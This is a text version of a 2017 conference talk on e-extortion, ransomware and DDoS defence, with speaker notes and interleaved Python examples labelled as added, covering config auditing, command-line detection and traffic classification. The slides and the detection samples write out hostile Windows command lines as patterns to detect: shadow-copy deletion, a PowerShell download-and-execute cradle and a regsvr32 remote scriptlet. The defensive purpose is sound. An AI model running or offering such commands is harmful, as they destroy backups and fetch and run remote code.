Erik Iker
Sr. Incident Response Analyst
B-Sides Tampa 2017
e-Extortion Trends & Defense
Cisco Confidential 2
2. Whoami
• Incident Response Analyst for Cisco Security Advisory Services. Working with customers performing strategic, proactive, and reactive response to information security issues
• 3 years – Insider threat analyst then Intrusion Forensics and Hunt Team manager at JPMorgan Chase
• 13 years law enforcement performing digital forensics and computer crime investigations
3. Agenda
Evolution of extortion and trends
Ransomware Defense
DDoS & Threat Intel
4. Extortion Defined
The practice of obtaining something, especially money, through force or threats
5. Attribution was simpler
6. First forays into e-extortion
• 2007 FBI release of warning about online extortion mirroring mafia tactics
7. DDoS “Protection” Racket
8. Armada Collective DHS Warning
9. Lizard Squad Gaming DDoS
10. Cats Catch Some Mice Again
• Early 2016 Interpol coordinated arrests of Armada Collective members in Australia, and DD4BC members in Bosnia and Herzegovina
11. Copy Cat Profiteering
12. Ransom Extends Extortion
• Ransom: Payment demanded for the release of a captured person or property
13. Data Breach Response Phishing
• Scammers leveraged breaches of adult-themed websites to scare victims into ransom payments
14. Data Breached for Ransom
15. Ransomware Scams That Can’t Decrypt
http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/
http://blog.talosintel.com/2016/07/ranscam.html
16. Ransom Hits Home
• Publicly accessible NoSQL, Elasticsearch, Hadoop, Redis being deleted with ransom note left.
• Completely unable to be recovered, EVEN IF YOU PAY
17. The Gift That Keeps Giving
• In January, Cisco Talos researchers found new variants of Locky also deliver the Kovter click fraud Trojan
• http://blog.talosintel.com/2017/01/locky-struggles.html
18. E-Extortion Trifecta
• Doxware brings all the extortion tactics into one, and is becoming more mainstream:
o Encryption
o Exfiltration
o Extortion demands
o Public Data Leak
19. What We Know So Far
• History repeats itself with the cat-and-mouse game, and innovation of the mice
– We have to be ready for the next evolution of threats
• Getting to know your enemy can keep you from paying out to imposters
– We need to gain intelligence about our threats
• Even if you pay your enemy, what keeps them from coming back again and again wanting more handouts?
– Let’s be prepared to defend ourselves and maintain business continuity plans
20. Ransom?
• “Without a hostage, there is no ransom. That’s what a ransom is.”
- The rules according to Walter Sobchak
21. Backups – Offline if Possible
• CryptoFortress – encrypting unmapped shares
• SamSam – Criminal group obtaining foothold through LFI, conducting surveillance, then encrypting everything including backup servers
22. System Hardening
• Over 90% of PowerShell scripts analyzed by Symantec were malicious in 2016. If endpoints don’t need PS, remove it
• If you can’t remove PS, disable ISE and REPL ability
• Application whitelisting
• Change default network options for NoSQL
o bind 127.0.0.1 instead of 0.0.0.0
o Change default ports to custom config to stifle script kiddies
o https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for-ransom
• Restrict IP ranges that can access your NoSQL instance
• Implement security group for cloud instances
o http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
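A configuration audit of the bind, port and security-group points above, as an added example that is not from the talk: it reads the listener address and port out of a minimal redis.conf, elasticsearch.yml or mongod.conf, then checks whether the inbound security-group rules it is given expose that port outside a trusted range. The config keys are the products' real ones; the sample configs, security-group rules and trusted CIDR are constructed, and a missing bind directive is deliberately treated as 0.0.0.0.

```python
import ipaddress
import re

# Defaults and sample data below are this example's assumptions, not values from the talk.
DEFAULT_PORTS = {"redis": 6379, "elasticsearch": 9200, "mongodb": 27017}
# Explicit all-interface binds, plus the Elasticsearch special values that bind beyond loopback.
WILDCARD_BINDS = {"0.0.0.0", "::", "*", "_global_", "_site_"}
LISTENER_KEYS = {  # (bind-address regex, port regex) per config format
    "redis": (r"^bind\s+(\S+)", r"^port\s+(\d+)"),
    "elasticsearch": (r"^network\.host:\s*(\S+)", r"^http\.port:\s*(\d+)"),
    "mongodb": (r"^bindIp:\s*(\S+)", r"^port:\s*(\d+)"),
}


def parse_listener(service, config_text):
    """Return (bind_address, port) from a minimal config file. A missing bind
    directive is treated as all interfaces: the conservative assumption, since
    the compiled-in default differs between products and versions."""
    host_re, port_re = LISTENER_KEYS[service]
    host, port = "0.0.0.0", DEFAULT_PORTS[service]
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and YAML indentation
        m = re.match(host_re, line)
        if m:
            host = m.group(1).strip("'\"")
        m = re.match(port_re, line)
        if m:
            port = int(m.group(1))
    return host, port


def audit(service, config_text, sg_rules, trusted_cidrs):
    """sg_rules: inbound rules in the shape of a cloud security group,
    [{"port": int, "cidr": str}]. trusted_cidrs: networks allowed to reach the
    datastore. Returns a list of finding strings (empty means nothing to fix)."""
    host, port = parse_listener(service, config_text)
    findings = []
    if host in WILDCARD_BINDS:
        findings.append(f"{service}: bound to {host}; bind 127.0.0.1 or an internal address")
    if port == DEFAULT_PORTS[service]:
        findings.append(f"{service}: still listening on default port {port}")
    trusted = [ipaddress.ip_network(c) for c in trusted_cidrs]
    for rule in sg_rules:
        if rule["port"] != port:
            continue
        net = ipaddress.ip_network(rule["cidr"])
        if not any(t.version == net.version and net.subnet_of(t) for t in trusted):
            findings.append(f"{service}: port {port} reachable from {rule['cidr']}; restrict to trusted ranges")
    return findings


# Constructed sample configs and security-group rules (weak beside hardened).
WEAK_REDIS = "bind 0.0.0.0\nport 6379\nprotected-mode no\n"
HARDENED_REDIS = "bind 127.0.0.1\nport 16379\nprotected-mode yes\n"
WEAK_ES = "cluster.name: prod\nnetwork.host: 0.0.0.0\nhttp.port: 9200\n"
MONGO = "net:\n  port: 27017\n  bindIp: 127.0.0.1\n"
SG_RULES = [{"port": 6379, "cidr": "0.0.0.0/0"}, {"port": 22, "cidr": "10.0.0.0/8"}]
TRUSTED = ["10.0.0.0/8"]

if __name__ == "__main__":
    for svc, cfg in (("redis", WEAK_REDIS), ("redis", HARDENED_REDIS), ("elasticsearch", WEAK_ES)):
        print(svc, audit(svc, cfg, SG_RULES, TRUSTED) or ["ok"])
```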
23. Endpoint Solutions
• Able to review for heuristic patterns of binaries being called, and review command line parameters such as:
o “Vssadmin.exe delete shadows /all /quiet del /f /q %0”
o “rundll32.exe C:\Users\$username\AppData\Local\Temp\”
o “rundll32.exe javascript:"\..\mshtml,RunHTMLApplication <script execution stuff>.RegRead("HKCU\<specific registry path>")” will interpret in the command line as “rundll32.exe mshtml.dll, $hexadecimal for entry point in memory”
o “regsvr32.exe /s /u /i:<^((http[s]?|ftp):\/)?\/?([^:\/\s]+)((\/\w+)*\/)([\w\-\.]+[^#?\s]+)(.*)?(#[\w\-]+)?$> scrobj.dll”
o “Powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('^((http[s]?|ftp):\/)?\/?([^:\/\s]+)((\/\w+)*\/)([\w\-\.]+[^#?\s]+)(.*)?(#[\w\-]+)?$')"”
o “Maliciousbinary.exe %windir%\system32\....%smstc.exe”
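One way to turn the command-line patterns above into detection logic, as an added example and not code from the talk: one regex rule per pattern on the slide, run over constructed process-creation events. The 'host', 'parent' and 'cmdline' field names, the placeholder hosts and the example.invalid URLs are this example's assumptions.

```python
import re

# Detection rules built from the command-line patterns on the slide. Rule names
# are this example's own; the process events further down are constructed.
RULES = [
    ("shadow_copy_deletion",
     r"vssadmin(\.exe)?\s+delete\s+shadows"),
    ("rundll32_from_user_temp",
     r'rundll32(\.exe)?\s+"?[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\'),
    ("rundll32_javascript_protocol",
     r"rundll32(\.exe)?\s+javascript:"),
    ("regsvr32_remote_scriptlet",
     r"regsvr32(\.exe)?\b.*/i:\s*(https?|ftp)://\S+.*scrobj\.dll"),
    ("powershell_download_cradle",
     r"powershell(\.exe)?\b.*\biex\b.*downloadstring"),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in RULES]


def scan(events):
    """Return one hit per (event, rule) pair. Each event is a process-creation
    record with 'host', 'parent' and 'cmdline' keys, as an EDR feed or Sysmon
    event ID 1 would supply (the field names are this example's assumption)."""
    hits = []
    for ev in events:
        for name, rx in COMPILED:
            if rx.search(ev["cmdline"]):
                hits.append({"rule": name, "host": ev["host"],
                             "parent": ev["parent"], "cmdline": ev["cmdline"]})
    return hits


# Constructed sample events; hosts, paths and URLs are placeholders, not indicators.
SUSPICIOUS_EVENTS = [
    {"host": "WS01", "parent": "cmd.exe",
     "cmdline": r"vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS02", "parent": "explorer.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\upd.dll,EntryPoint"},
    {"host": "WS02", "parent": "explorer.exe",
     "cmdline": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<script placeholder>'},
    {"host": "WS03", "parent": "winword.exe",
     "cmdline": r"regsvr32.exe /s /u /i:http://example.invalid/x.sct scrobj.dll"},
    {"host": "WS03", "parent": "winword.exe",
     "cmdline": 'powershell -nop -c "iex(New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\')"'},
]
BENIGN_EVENTS = [
    {"host": "WS01", "parent": "cmd.exe", "cmdline": r"vssadmin.exe list shadows"},
    {"host": "WS02", "parent": "explorer.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"host": "WS03", "parent": "taskeng.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for h in scan(SUSPICIOUS_EVENTS):
        print(f"{h['host']} [{h['parent']}] {h['rule']}: {h['cmdline']}")
```

The parent process is carried through because the same command line from winword.exe and from an admin console deserve different triage priority.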
24. Ransomware Decryptors
• https://www.nomoreransom.org/
• http://www.talosintelligence.com/teslacrypt_tool/
25. What About Things That Aren’t Ransomware?
26. One DDoS Does Not Fit All
• Volume based attacks – goal is to overload bandwidth – UDP flood, ICMP floods (bits per second)
• Protocol attacks – goal is to overload router, firewall, and GLB – fragmented packets, Smurf attack (spoof victim IP for requests reflected at victim) (packets per second)
• Application attacks – goal is to overload the resources of the web server – flood of GET or POST requests – Slowloris – creating connections with only partial requests to leave connection open (requests per second)
27. Mirai
• Internet of Terribly Secured Things opened the door to the most geographically dispersed botnets for DDoS
• Mirai takes over device and shuts off Telnet, SSH, and HTTP ports so remote access isn’t possible for remediation
• Baby monitors and CCTV cameras responsible for high profile attacks
• Using dictionary of ~60 weak passwords (less than the Morris
28. DDoSaaS
29. DDoS Game Plan
• Be able to detect DDoS before the network is inaccessible or systems are crashing, using NetFlow, system resource, and firewall traffic monitoring dashboards
• Have a plan for blocking, dropping, scrubbing, rate limiting traffic using local appliances or a vendor relationship
• Do not rely solely on an agreement with ISP as your plan for DDoS mitigation
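The three DDoS classes from slide 26 and the "detect before the link is saturated" goal of this slide, as an added example that is not from the talk: it buckets constructed NetFlow-style records into one-second windows and alerts on bits per second, packets per second and requests per second against an assumed link capacity and normal-day baselines (all numbers below are assumptions to tune per environment).

```python
from collections import defaultdict

# Assumed capacity and baselines (constructed; tune to your own NetFlow history).
LINK_BPS = 1_000_000_000      # 1 Gbit/s upstream link
LINK_ALARM = 0.6              # alert at 60% utilisation, before saturation
BASELINE_PPS = 50_000         # typical peak packets per second
BASELINE_RPS = 2_000          # typical peak new web requests per second


def classify_window(flows):
    """Classify one 1-second bucket of flow records into the slide's three DDoS
    classes. Each record has proto, dport, packets, bytes and fragmented (bool)."""
    bits = sum(f["bytes"] for f in flows) * 8
    pkts = sum(f["packets"] for f in flows)
    udp_icmp_bits = sum(f["bytes"] * 8 for f in flows if f["proto"] in ("udp", "icmp"))
    junk_pkts = sum(f["packets"] for f in flows
                    if f["proto"] == "icmp" or f.get("fragmented"))
    web = [f for f in flows if f["proto"] == "tcp" and f["dport"] in (80, 443)]
    rps = len(web)   # simplification: one new web flow counts as one request
    avg_web_bytes = sum(f["bytes"] for f in web) / rps if rps else 0
    alerts = []
    # Volume based: link nearly full and most of it is UDP/ICMP (bits per second).
    if bits >= LINK_ALARM * LINK_BPS and udp_icmp_bits / bits > 0.5:
        alerts.append("volumetric")
    # Protocol: packet rate far above baseline, dominated by ICMP or fragments (pps).
    if pkts >= 3 * BASELINE_PPS and junk_pkts / pkts > 0.5:
        alerts.append("protocol")
    # Application: request rate far above baseline made of tiny flows (rps).
    if rps >= 3 * BASELINE_RPS and avg_web_bytes < 600:
        alerts.append("application")
    return {"bps": bits, "pps": pkts, "rps": rps,
            "link_util": round(bits / LINK_BPS, 2), "alerts": alerts}


def detect(records):
    """Bucket timestamped flow records by second and classify each bucket."""
    buckets = defaultdict(list)
    for r in records:
        buckets[int(r["ts"])].append(r)
    return {ts: classify_window(flows) for ts, flows in sorted(buckets.items())}


def _flows(ts, n, **fields):
    return [dict(ts=ts, fragmented=False, **fields) for _ in range(n)]


# Constructed sample: t=0 normal traffic, t=1 UDP flood, t=2 ICMP flood,
# t=3 HTTP request flood.
SAMPLE = (
    _flows(0, 800, proto="tcp", dport=443, packets=40, bytes=30_000)
    + _flows(1, 60, proto="udp", dport=53, packets=1_200, bytes=1_500_000)
    + _flows(2, 100, proto="icmp", dport=0, packets=2_000, bytes=120_000)
    + _flows(3, 7_000, proto="tcp", dport=80, packets=3, bytes=300)
)

if __name__ == "__main__":
    for ts, result in detect(SAMPLE).items():
        print(ts, result)
```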
30. Start with Google
31. Follow the Money
32. Intel Feeds and Community Membership
• ISACs
o msisac.cisecurity.org
o fsisac.com
o r-cisc.org
• Malware sharing - www.misp-project.org
• MITRE Threat Intel Project - https://crits.github.io/
• Tons of paid vendor feeds
33. Use Your Phishing Quarantine Data
34. Thanks
• Twitter - @ErikIkerFW
• LinkedIn - www.linkedin.com/in/erikiker


Editor's Notes

  • #5 Extortion threats and vulnerabilities were easier to gauge prior to the beginnings of e-extortion
  • #6 Mafia-style extortion had some drawbacks, mainly due to easier attrition and law enforcement action. Throughout the entire life of extortion, though, the cat-and-mouse evolution stays the same
  • #7 As with all things, everything old is new again. This threat resurfaced in 2013 without much change in the wording, but was at least leveraging new technology and asking for bitcoin payment with a link to a BTC address.
  • #9 History repeats itself in 2015 when the real Armada Collective causes harm to many email and financial institutions. The warning by DHS shows that there was a small DDoS attack, a show of power, followed by an email demand for payment.
  • #10 Lizard Squad received much media attention for its DDoS attacks on gaming networks despite giving warning of the attacks ahead of time on Twitter. They also chose to stop their Christmas 2014 DDoS of the Xbox network after Kim Dotcom agreed to pay them in Megaupload vouchers so he could play Destiny
  • #12 After Armada Collective was arrested, this group sent phish emails to companies and cashed in without ever launching an attack. The MO of email before DDoS didn’t match what the real Armada Collective did, and it didn’t take a costly Threat Intel feed to google the DHS alert to know how the real group’s operation differed. All it takes is an email address to collect money if you can capitalize on a famous name. In 2015 multiple companies paid up to phishing emails after seeing what the mighty Sony and Microsoft networks couldn’t stop from Lizard Squad.
  • #14 Adult Friend Finder, Brazzers, Ashley Madison, Penthouse, YouPorn, Fur Affinity
  • #15 We are now seeing the combination of ransomware with other types of malware to keep attacks active after the payment of ransom. With high profile ransoms for breached data by certain actors, and the profitability of ransomware, why have these forces not combined ransomware with information stealing malware, to exfiltrate encrypted files, and then sell the data online if the ransom is not paid, or even if it is?
  • #16 Ranscam differs from other ransomware families like Locky, Cryptolocker, Cerber etc., because even if you pay, they do not release your files. Definitely good to know if you will be paying for nothing. Will be interesting to see how this changes the underground economy of ransomware. A newer variant is Linux KillDisk, demanding $250k
  • #17 Victor Gevers (security researcher) started noting MongoDB being deleted Dec 26, 2016. Expanded to others. Scriptable actions, no recovery possible. Sigaint email addresses are in multiple campaigns
  • #18 Even after files released on Locky payment, infection can remain
  • #19 Combining Pony credential stealing with ransomware. Becoming more prevalent since Oct 2016, reported on by https://www.scmagazine.com/researchers-spot-ransomware-with-abilities-to-leak-data-for-non-compliance/article/567622/
  • #21 Big Lebowski. Found Bunny Lebowski went home, and the Germans kept trying to get the ransom money. WTF, Walter said. Those are the rules. Is he the only one who cares about the rules? If we can keep ransomware from having any effect, then there is no ransom at all. Next slides discuss how.
  • #22 Offline backups need to be emphasized with the new ransomware variant CryptoFortress, discovered in March 2016, seeking SMB paths not even mapped. Samas targeting backup servers. Have you tried to recover from those backups and seen if your process and backup style/age is conducive to it? Changes to PsExec key, terminal server key, PuTTY key
  • #23 Disable ports and services not needed. Eliminate PowerShell if not needed. Disable REPL or ISE if PowerShell is needed. Use VPS security groups. https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/
  • #24 Visibility to new MD5 on system, new services, scheduled jobs, registry key changes (PuTTY, terminal services, PsExec keys etc.)
  • #26 Application whitelisting – alternatively limit executables to run only from certain paths. Disable unneeded ports and services (HTTP etc). Defined roles on network shares with least privilege for user access. Privileged account management. If machines/shares are affected, is there a plan for continuity, to segment that machine and route traffic around, or go to paper?
  • #27 Game plan for detecting DDoS before there are saturated links or system resource issues. Types of DDoS; discuss early detection from Lancope or other systems, having a plan for blocking, dropping, monitoring, scrubbing. In-network appliances can mitigate application layer attacks – geo-blocking (50% of DDoS originating IP space in China), rate limiting, signatures of packets. Partnership with Radware, Arbor, Cloudflare. Don’t rely on ISP as the only play in your playbook
  • #28 Baby monitors – DynDNS attack. CCTV cameras – Krebs attack
  • #29 Lizard Squad also innovated with DDoS as a Service, where anyone with a bitcoin or two could lease their power to shut down any site they wanted. Recent arrests of 3 in Israel who had profited $600,000 renting out DDoS infrastructure.
  • #30 Game plan for detecting DDoS before there are saturated links or system resource issues. Types of DDoS; discuss early detection from Lancope or other systems, having a plan for blocking, dropping, monitoring, scrubbing. In-network appliances can mitigate application layer attacks – geo-blocking (50% of DDoS originating IP space in China), rate limiting, signatures of packets. Partnership with Radware, Arbor, Cloudflare. Don’t rely on ISP as the only play in your playbook
  • #31 To not be one of the statistics in the $100,000 paid in BTC to Armada Collective imposters in 2016, or any amount to its peers, all a victim needed to do was look on Twitter or Google. Both are perfectly good sources of intel. A solid list of infosec leaders being followed on Twitter can be a great early warning system
  • #32 Following the money might not be for everyone, but law enforcement is now able to track transactions of Bitcoin all the way to the wallets. These types of tools are also increasingly being used by financial institutions who need to comply with KYC regulations if they want to take part in any blockchain transactions. It’s how we know that $209 million has been paid out to ransomware in Q1 and Q2 2016. You can see if others are paying to the wallet from your issue. If not, maybe it is targeted?
  • #33 Collage of threat intel vendors, discussion of CIM, STIX, TAXII and integration
  • #34 Visualize your own logs from phishing campaigns, bucketing for work groups, M&A activity, projects people are on. Collecting data on who the recipients are for phishing emails can begin to show you relationships, especially if you use a visualization tool such as i2 Analyst’s Notebook, Splunk, or on the free side, an ELK stack. Are there common recipients between campaigns, does this happen often, are they in the same workgroup, are they working on a deal with the same external customer, could that customer have had a breach causing a leak of emails, or is that customer possibly doing their own recon? It has been known to happen. A word cloud will be weighted to show the most common terms as larger, and can be valuable for showing any common items that could be used for detection, or just to know trends. This can be valuable not only for real phishing, but for phishing training to know what your employees are more susceptible to
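Speaker note #34 describes the quarantine analysis in words; what follows is an added example, not material from the talk, that performs it on constructed quarantine records: recipients hit by more than one campaign, how quarantined mail concentrates per workgroup, and term frequency over campaign subjects as word-cloud input. The record fields and the stopword list are this example's assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed quarantine export. 'campaign' is the gateway's cluster id for
# near-identical messages; 'group' is the recipient's workgroup from HR/AD.
QUARANTINE = [
    {"campaign": "C1", "subject": "Invoice 4471 overdue", "to": "ann@corp.example", "group": "finance"},
    {"campaign": "C1", "subject": "Invoice 4471 overdue", "to": "bob@corp.example", "group": "finance"},
    {"campaign": "C2", "subject": "Wire transfer approval needed", "to": "ann@corp.example", "group": "finance"},
    {"campaign": "C2", "subject": "Wire transfer approval needed", "to": "cat@corp.example", "group": "m&a"},
    {"campaign": "C3", "subject": "Invoice 4492 past due", "to": "cat@corp.example", "group": "m&a"},
    {"campaign": "C3", "subject": "Invoice 4492 past due", "to": "dan@corp.example", "group": "legal"},
]
STOPWORDS = {"for", "the", "and", "of", "to", "needed", "past"}   # assumed list


def repeat_targets(records, min_campaigns=2):
    """Recipients seen in at least min_campaigns distinct campaigns, with the
    campaigns and their workgroup: the 'common recipients' question in the note."""
    campaigns = defaultdict(set)
    group = {}
    for r in records:
        campaigns[r["to"]].add(r["campaign"])
        group[r["to"]] = r["group"]
    return {who: {"campaigns": sorted(c), "group": group[who]}
            for who, c in campaigns.items() if len(c) >= min_campaigns}


def group_concentration(records):
    """Share of quarantined mail per workgroup; a skewed share is the
    'same workgroup / same deal' signal the note asks about."""
    counts = Counter(r["group"] for r in records)
    total = sum(counts.values())
    return {g: round(n / total, 2) for g, n in counts.most_common()}


def subject_terms(records):
    """Term frequency over distinct campaign subjects, i.e. word-cloud weights.
    Each campaign counts once so a large campaign does not dominate."""
    subjects = {r["campaign"]: r["subject"] for r in records}
    terms = Counter()
    for subject in subjects.values():
        terms.update(t for t in re.findall(r"[a-z0-9]+", subject.lower())
                     if t not in STOPWORDS and len(t) > 2)
    return terms


if __name__ == "__main__":
    print(repeat_targets(QUARANTINE))
    print(group_concentration(QUARANTINE))
    print(subject_terms(QUARANTINE).most_common(5))
```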